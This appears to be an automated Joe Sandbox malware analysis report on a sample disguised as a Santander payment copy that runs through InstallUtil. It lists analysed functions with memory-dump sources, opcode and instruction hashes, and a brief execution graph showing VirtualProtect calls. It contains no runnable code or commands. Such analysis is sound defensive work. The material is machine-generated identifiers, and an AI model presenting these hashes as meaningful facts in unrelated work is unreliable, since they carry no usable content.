                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562664289.000000000178D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0178D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_178d000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d4b1112ad8858f35629223d52db32373eada1eafae2bfb9d6b191689b7a1956a
                                              • Instruction ID: 55a9b4d115ebfe2bfb48db6ef92d4355630d358adfc8991b9bdad4ac4b226a24
                                              • Opcode Fuzzy Hash: d4b1112ad8858f35629223d52db32373eada1eafae2bfb9d6b191689b7a1956a
                                              • Instruction Fuzzy Hash: 0CF0F6711443849EE7209E0ADD88B63FF98EB41734F18C05AED084F2C7C2799840CB71
                                              Function 0307E1F0 Relevance: .0, Instructions: 24COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 94d75549a3b1d7e3b10e3c3e4d41a1f64782faf687060508bfa2004664f3830b
                                              • Instruction ID: fcd21b16590e6f42b46a77df331c351e8c93c94c0b426b23403875922577d74d
                                              • Opcode Fuzzy Hash: 94d75549a3b1d7e3b10e3c3e4d41a1f64782faf687060508bfa2004664f3830b
                                              • Instruction Fuzzy Hash: 8DF03934D0220CEFCB80DFA8C584A9CFBF5EB48300F10C4AAAC18A3340D6329A52DF40
                                              Function 07855BE0 Relevance: .0, Instructions: 23COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1580492791.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7840000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7b950e4e659184c1ff2eeddb817f4cfdd52c8cf19eb43440a893728260d42780
                                              • Instruction ID: d80f8582f0b9fdaee508e1b162eed77203f6cc911ee525bd1b1e60cbeeb3cb59
                                              • Opcode Fuzzy Hash: 7b950e4e659184c1ff2eeddb817f4cfdd52c8cf19eb43440a893728260d42780
                                              • Instruction Fuzzy Hash: DAE0C974D05208EFCB44DFA8D545A9CBBB5EB59314F10C4AA9C19A3340D6359A52DF41
                                              Function 0785B5C8 Relevance: .0, Instructions: 23COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1580492791.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7840000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7b950e4e659184c1ff2eeddb817f4cfdd52c8cf19eb43440a893728260d42780
                                              • Instruction ID: 0b73322fe72ab0ebd07bd3c9f56ebcdb6a3ed08ca0b590ad872327f1dde7038c
                                              • Opcode Fuzzy Hash: 7b950e4e659184c1ff2eeddb817f4cfdd52c8cf19eb43440a893728260d42780
                                              • Instruction Fuzzy Hash: A5E0C9B4D05208EFCB44DFA8D545A9CBBB5EB69314F10C4AADC18E3340D6359A52DF41
                                              Function 0785A168 Relevance: .0, Instructions: 23COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1580492791.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7840000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7b950e4e659184c1ff2eeddb817f4cfdd52c8cf19eb43440a893728260d42780
                                              • Instruction ID: 558ec5a71c7c31eb6f779844dc7d4f755cc819cbdb94cb806d890e553b8d7bc3
                                              • Opcode Fuzzy Hash: 7b950e4e659184c1ff2eeddb817f4cfdd52c8cf19eb43440a893728260d42780
                                              • Instruction Fuzzy Hash: 8EE0C2B4E05208EFCB44DFA8D584AACBBB5EB59314F10C5AA9C19A3340D6369A52DF81
                                              Function 07859E88 Relevance: .0, Instructions: 22COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1580492791.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7840000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a2247bd62dbf37df032fccea627d7a5b28aaee08370753d68501717524613335
                                              • Instruction ID: 093a405d612d70d17d5f476988202388d80d0fb2bb8d6e484fbc9e2d4abada3f
                                              • Opcode Fuzzy Hash: a2247bd62dbf37df032fccea627d7a5b28aaee08370753d68501717524613335
                                              • Instruction Fuzzy Hash: 03E0ED74D05208EFCB44DFA8D54569CB7F5EB49214F10C4A9DC18D3344D6366A42CF41
                                              Function 0785F890 Relevance: .0, Instructions: 21COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1580492791.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7840000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f115649067843810be8ed7a57bcffef1acd33edd548601cabee1ac9e330cae5
                                              • Instruction ID: 99497d3fb02836edcacaadf4e9bfc96023add47331176fc9230f47383eea39c1
                                              • Opcode Fuzzy Hash: 6f115649067843810be8ed7a57bcffef1acd33edd548601cabee1ac9e330cae5
                                              • Instruction Fuzzy Hash: B4E086B590520CEBCB04DF94D54096DBB78EB5A314F24C499DD44A7345C6319A42DB91
                                              Function 03070A5E Relevance: .0, Instructions: 20COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 88a1af8eee4d1caa6c7ad6fdd7b460d76d173b6fba89a23c661e829559a97e74
                                              • Instruction ID: d82dcaac363c77a9fabbdc6bb6f7c5b46062a062847eff6c065fbb80f28eb559
                                              • Opcode Fuzzy Hash: 88a1af8eee4d1caa6c7ad6fdd7b460d76d173b6fba89a23c661e829559a97e74
                                              • Instruction Fuzzy Hash: 7BE0AE70E4120DEBDB20CB94C958BEDBBB1AB48700F144919D101BA290CBB54848CB65
                                              Function 078587A0 Relevance: .0, Instructions: 20COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1580492791.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7840000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 868c5b6c5f819782838b5c1061c36c60cec089da76460e43a2a7f33c89bc81d1
                                              • Instruction ID: 825f507e7bef3da814421d5f9570e7e10e3c03bdabf6e3d3b50790888ccea652
                                              • Opcode Fuzzy Hash: 868c5b6c5f819782838b5c1061c36c60cec089da76460e43a2a7f33c89bc81d1
                                              • Instruction Fuzzy Hash: F1E01A74D05208EFCB04DFA4D5406BCFBB5AB49205F1084AA8C1893341D6355A42CB81
                                              Function 0785FDB8 Relevance: .0, Instructions: 20COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1580492791.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7840000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c78efe7f3301640c2c25086d034fc47bffeda74d805ea6a742225751928f7f01
                                              • Instruction ID: 2d406084af072953c6dab6b9c2f0bae015d51436e9c215b904e1ff53b85053a3
                                              • Opcode Fuzzy Hash: c78efe7f3301640c2c25086d034fc47bffeda74d805ea6a742225751928f7f01
                                              • Instruction Fuzzy Hash: 2CE0E67491520CEFCB84DFA8D58566CBBF4EB59214F2084E98D08D7341D7319A46CB41
                                              Function 0307D1C8 Relevance: .0, Instructions: 19COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a81f767cf0e8862e891908d4817e11dcdac4aecc2c30a76e0b259436dd9c4a1a
                                              • Instruction ID: 1805f62ef9f4c209f387d5fadc78a360d491999c264f8d5181669d60e42b6437
                                              • Opcode Fuzzy Hash: a81f767cf0e8862e891908d4817e11dcdac4aecc2c30a76e0b259436dd9c4a1a
                                              • Instruction Fuzzy Hash: C9E0C27180220CEFCB41EFF4E50479EB7EAEB09200F0048A5D509E3200EA314A048792
                                              Function 0785DA68 Relevance: .0, Instructions: 19COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1580492791.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7840000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6877783b4ef7aa1c6f3786041aa90666c0a3a931c6e28825f56a9778cde5c9bd
                                              • Instruction ID: 653c5cd8aca7315a5a1160ba1979c1a5043de0bb077761367b796fbdaea26788
                                              • Opcode Fuzzy Hash: 6877783b4ef7aa1c6f3786041aa90666c0a3a931c6e28825f56a9778cde5c9bd
                                              • Instruction Fuzzy Hash: A5E0C274A0920CEBCB04DF94E68056DBB79EB56304F20C49DCC0863340DA325E42CB91
                                              Function 0785D270 Relevance: .0, Instructions: 19COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1580492791.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7840000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b260e77455f30f708b0176bcdffedc245e26725c02437e31eb01b8c8b1334239
                                              • Instruction ID: 798c892698c24e77b7e2b3b25d3118ab8b6bf5a60fb813c5f4173c9a861392c1
                                              • Opcode Fuzzy Hash: b260e77455f30f708b0176bcdffedc245e26725c02437e31eb01b8c8b1334239
                                              • Instruction Fuzzy Hash: 28E0C2B190220CEBCB01EFF0C54069EB3A89B05100F0049A6C509E3100ED328A0587A3
                                              Function 0307D030 Relevance: .0, Instructions: 11COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ab8080d084baab52dde3c4c11352565107a77aa785e6890653982b29306e0250
                                              • Instruction ID: a49d749793957fff98adbc40551cc9e57a46941bace9b8fa91162093d425ff52
                                              • Opcode Fuzzy Hash: ab8080d084baab52dde3c4c11352565107a77aa785e6890653982b29306e0250
                                              • Instruction Fuzzy Hash: 17C02B31003308CFDA50BBE8E20DBA8B3886F82145F001410D34D514004F3800D5C5BF
                                              Function 03070841 Relevance: .0, Instructions: 8COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04366c134b698676058cb8228fe5ebadf677a055331303716c17b4bf8282d011
                                              • Instruction ID: ce91765a0d82302dc5057477d8cdbec683ed9e87c70cbe37123d0397dbe4b26b
                                              • Opcode Fuzzy Hash: 04366c134b698676058cb8228fe5ebadf677a055331303716c17b4bf8282d011
                                              • Instruction Fuzzy Hash: 73C04C6141D6804FCB539B50981A5557F716A1220174AC29BE4C1C9196D5154508C796

                                              Non-executed Functions

                                              Function 05C5D760 Relevance: .3, Instructions: 282COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1576594089.0000000005C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5c50000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1fffb9249dda420f9df071a260327c82ce3dda8f4822da285492200f2330e6ff
                                              • Instruction ID: 1686713ffeb252d197ab1d8813a663d7deb282ce05db4ec5a5d846c42e52b1df
                                              • Opcode Fuzzy Hash: 1fffb9249dda420f9df071a260327c82ce3dda8f4822da285492200f2330e6ff
                                              • Instruction Fuzzy Hash: B7D1E274E002198FDB64DFA9D844B9EB7F2FB88300F1085AAD50AA7355DB34AE858F51
                                              Function 05C5D750 Relevance: .3, Instructions: 255COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1576594089.0000000005C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5c50000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d34ea8cd9b58a38404fced43541b90858b88f6a85ad4468b1e25c2118f0b0163
                                              • Instruction ID: 448d023fd8ce9bd586b6e28074adee78fb63c108251d73cbec8119121dd577c5
                                              • Opcode Fuzzy Hash: d34ea8cd9b58a38404fced43541b90858b88f6a85ad4468b1e25c2118f0b0163
                                              • Instruction Fuzzy Hash: 92C1F570E002198FDB64DFA9D854B9EB7F2FB88300F10859AD50AA7355DB349E85CF51
                                              Function 05C5D987 Relevance: .2, Instructions: 227COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1576594089.0000000005C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5c50000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e6657c79d44833685a014dd62603350ef23ef531d3a3284e84b2ee35d9118cad
                                              • Instruction ID: 92fcebf9d0c9d14293ad6f97983a1f99c904b72f13533856dda7a4e9cc3736ea
                                              • Opcode Fuzzy Hash: e6657c79d44833685a014dd62603350ef23ef531d3a3284e84b2ee35d9118cad
                                              • Instruction Fuzzy Hash: 67B1F070E002198FDB64DFA9D884B9EB7F2FB98300F10859AD50AA7354DB34AE858F51
                                              Function 05C50868 Relevance: .2, Instructions: 215COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1576594089.0000000005C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5c50000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 75b4a1ca1116ec6ad26a5c098ed00018c2d664a938d851022e96d896f0b5c2a3
                                              • Instruction ID: f6837db942aded2ebb80452db28f2ab87e4c9bac2410187c94aaf4cd3fa2713d
                                              • Opcode Fuzzy Hash: 75b4a1ca1116ec6ad26a5c098ed00018c2d664a938d851022e96d896f0b5c2a3
                                              • Instruction Fuzzy Hash: 3F91F370E05208CFEB14DFA9D448BAEBBF2FB89310F209569D40AB7255DB389985CF54
                                              Function 05C50867 Relevance: .2, Instructions: 212COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1576594089.0000000005C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5c50000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b98ff9a4ecce8c527ff1cf10fcdbfb2fe30dfe9d96346682cb3d7dad901df55b
                                              • Instruction ID: ba16f431076bc524f8fd57c491fdf77c1f8d0cb2fd1aaaf13c1b58e9a0d6c128
                                              • Opcode Fuzzy Hash: b98ff9a4ecce8c527ff1cf10fcdbfb2fe30dfe9d96346682cb3d7dad901df55b
                                              • Instruction Fuzzy Hash: CD81F270E05208CFEB14DFA9E448BAEBBF2FB89310F209469D409B7255DB389985CF54
                                              Function 05C50B75 Relevance: .2, Instructions: 191COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1576594089.0000000005C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5c50000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e40a4d36dc68e890375c5c4dc3aa1d9dd258be3bec6a2b49737033267d40249d
                                              • Instruction ID: b77c825090da8a50d6fdb80a7a7389313e358840db09ec02d7b2b3dcee652cf9
                                              • Opcode Fuzzy Hash: e40a4d36dc68e890375c5c4dc3aa1d9dd258be3bec6a2b49737033267d40249d
                                              • Instruction Fuzzy Hash: 5681F374E05208CFEB14DFA9E488BAEBBF2FB49310F209569D409E7255DB389985CF44
                                              Function 0785DAA8 Relevance: .2, Instructions: 189COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1580492791.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7840000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7554e0dd6d94f35ba66fd9756a3f763cfd14de49875b21ca75bb85abf6180640
                                              • Instruction ID: b21b6ece31e1a13ade5152e1238c9efcb5eedab088388a7fbc536d0e7039d4c3
                                              • Opcode Fuzzy Hash: 7554e0dd6d94f35ba66fd9756a3f763cfd14de49875b21ca75bb85abf6180640
                                              • Instruction Fuzzy Hash: A37149B0E1421CCFDB54DFA9C8847ADBBB6BF9A304F1090A9C809A7350DB745985CF61
                                              Function 030793A7 Relevance: .2, Instructions: 166COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a51ad332cfee3565cb4d20b550c345e21a84bd8c2964902f42f05dda6e56eafe
                                              • Instruction ID: 719646016cc98920079adf76a3955f317772afc1fba7ccd29509bdbaa7a575a4
                                              • Opcode Fuzzy Hash: a51ad332cfee3565cb4d20b550c345e21a84bd8c2964902f42f05dda6e56eafe
                                              • Instruction Fuzzy Hash: 79710D70E016098FE719EF6EF854A9EBBF3FB88710F14C129D0049B269DB75584B8B91
                                              Function 030793A8 Relevance: .2, Instructions: 165COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a841f68f66f3e69855e7142abbe48fe0e1d3c0ea78c0ceb3e54b1929bdda1c81
                                              • Instruction ID: f74f7d20d71a77e28490b9e609178605edc42feaaee0480ccbff732073c20063
                                              • Opcode Fuzzy Hash: a841f68f66f3e69855e7142abbe48fe0e1d3c0ea78c0ceb3e54b1929bdda1c81
                                              • Instruction Fuzzy Hash: 90710D70E016098FE719EF6EE854A9EBBF3FB88710F14C129D0049B269DB75584B8B91
                                              Function 07840040 Relevance: .1, Instructions: 86COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1580492791.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7840000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 21c9dacfc57f55d9f9283e5494b1f79091f9960d5ef36d22776e54750607029f
                                              • Instruction ID: d70cb8fd44d71bcd34b5ab8347827a117b79b271f231e2bf8bc012107ed9f578
                                              • Opcode Fuzzy Hash: 21c9dacfc57f55d9f9283e5494b1f79091f9960d5ef36d22776e54750607029f
                                              • Instruction Fuzzy Hash: 2C410AB1E01229CFDB68CF1AC89879AB7F6AF89304F14C0EAD51CA7654DB744A85CF01
                                              Function 07840007 Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1580492791.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7840000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4be53d9b06277fc4b73780b2cbdd1d4ba6303613acf6c8e9d2ffd47d35f7cd92
                                              • Instruction ID: 9d8963cafb71ac5f8de2116f5736da8e84feca0e79ba7ff6e920d92b99f2a5f9
                                              • Opcode Fuzzy Hash: 4be53d9b06277fc4b73780b2cbdd1d4ba6303613acf6c8e9d2ffd47d35f7cd92
                                              • Instruction Fuzzy Hash: 91314171D057958FE71ACF6A885468ABFF2AF86200F15C0FBC548AA255DB740985CF11
                                              Function 03079938 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e1e7987c1d2c93cd63b781f99097a8edcf5b376d77cda8ff78c784ef5ebba2b1
                                              • Instruction ID: 02696d2818ddf65c6e67a3592c6c3a48ca8aacf48d8036f1cce233d7c914b86e
                                              • Opcode Fuzzy Hash: e1e7987c1d2c93cd63b781f99097a8edcf5b376d77cda8ff78c784ef5ebba2b1
                                              • Instruction Fuzzy Hash: E73167B1D066188BEB68CF6BD95878AFAF7BFC8304F14C1A9C40CA6254DB750A858F51

                                              Execution Graph

                                              Execution Coverage:4%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:11
                                              Total number of Limit Nodes:0
                                              execution_graph 37988 ca5138 37989 ca514c 37988->37989 37991 ca6321 37988->37991 37994 cad630 37991->37994 37996 cad643 37994->37996 37998 cad6e0 37996->37998 37999 cad728 VirtualProtect 37998->37999 38001 ca6340 37999->38001 38002 cad890 38003 cad8d0 CloseHandle 38002->38003 38005 cad901 38003->38005

                                              Executed Functions

                                              Function 04F17D20 Relevance: 2.4, Strings: 1, Instructions: 1176COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2417319539.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4f10000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4
                                              • API String ID: 0-4088798008
                                              • Opcode ID: 34cdf51a629e3348349c5f113654e4993a082f755fb72ae92b6fdf5d76b11240
                                              • Instruction ID: 770be3e855f1e48fc79ec4e08da7639ddc10d968ca8fb3756a516b75abeff367
                                              • Opcode Fuzzy Hash: 34cdf51a629e3348349c5f113654e4993a082f755fb72ae92b6fdf5d76b11240
                                              • Instruction Fuzzy Hash: 06B2F534A00218CFDB24EFA5C994BADB7B6FF48340F158199E505AB3A5DB71AD82CF50
                                              Function 04F18047 Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2417319539.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4f10000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4
                                              • API String ID: 0-4088798008
                                              • Opcode ID: 5311c0010ff9cf4e6c671d6727badba8c981b5eed8e3402b90aed9c8d1ee13d4
                                              • Instruction ID: 61791f032331c830c568d6d47c769378cd0352b72d9b3f25618cfe84a647cf31
                                              • Opcode Fuzzy Hash: 5311c0010ff9cf4e6c671d6727badba8c981b5eed8e3402b90aed9c8d1ee13d4
                                              • Instruction Fuzzy Hash: 4422F934A00218CFDB24EF65C994BADB7B2FF48344F158199E509AB3A5DB70AD82CF50
                                              Function 04F1B148 Relevance: .7, Instructions: 696COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2417319539.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4f10000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1a7715355025bfff9affae9cb5ad6db3293d9685107c34b26319ea27fd204ba0
                                              • Instruction ID: 701d338776d0ac5cf08780b84c8da86aaa16289e46cb84fb8ebff8b62ca6b645
                                              • Opcode Fuzzy Hash: 1a7715355025bfff9affae9cb5ad6db3293d9685107c34b26319ea27fd204ba0
                                              • Instruction Fuzzy Hash: BB421634B00605CFEB24EF29C994A6AB7E2BF89750B1584A9E506CB375DB31FC42CB51
                                              Function 04DA098D Relevance: .4, Instructions: 382COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
